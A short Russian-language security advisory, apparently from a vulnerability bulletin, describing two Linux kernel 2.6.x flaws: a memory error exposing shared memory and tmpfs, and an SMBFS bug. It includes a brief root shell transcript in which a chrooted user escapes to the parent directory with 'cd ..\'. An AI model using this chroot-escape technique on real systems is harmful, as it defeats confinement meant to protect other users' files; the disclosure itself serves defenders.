Уязвимость позволяет удаленному злоумышленнику получить доступ к конфиденциальной информации системы.
1) Уязвимость существует из-за ошибки в работе с памятью. Атакующий может получить доступ на чтение и запись в разделяемую память и доступ на запись в файловую систему tmpfs.
2) Уязвимость существует из-за ошибки в файловой системе SMBFS. Локальный атакующий, имеющий ограничения chroot может обойти систему безопасности и получить неавторизованный доступ к файловой системе.
Пример:
Linux kernel 2.6.x
root@server me]# pwd
/path/to/my/dir
[root@server me]# ls
bin chroot etc lib
[root@server me]# chroot .
bash-2.05a# pwd
/
bash-2.05a# ls
bin chroot etc lib
bash-2.05a# cd ..\bash-2.05a# pwd
/..bash-2.05a# ls
<list of files from parent>
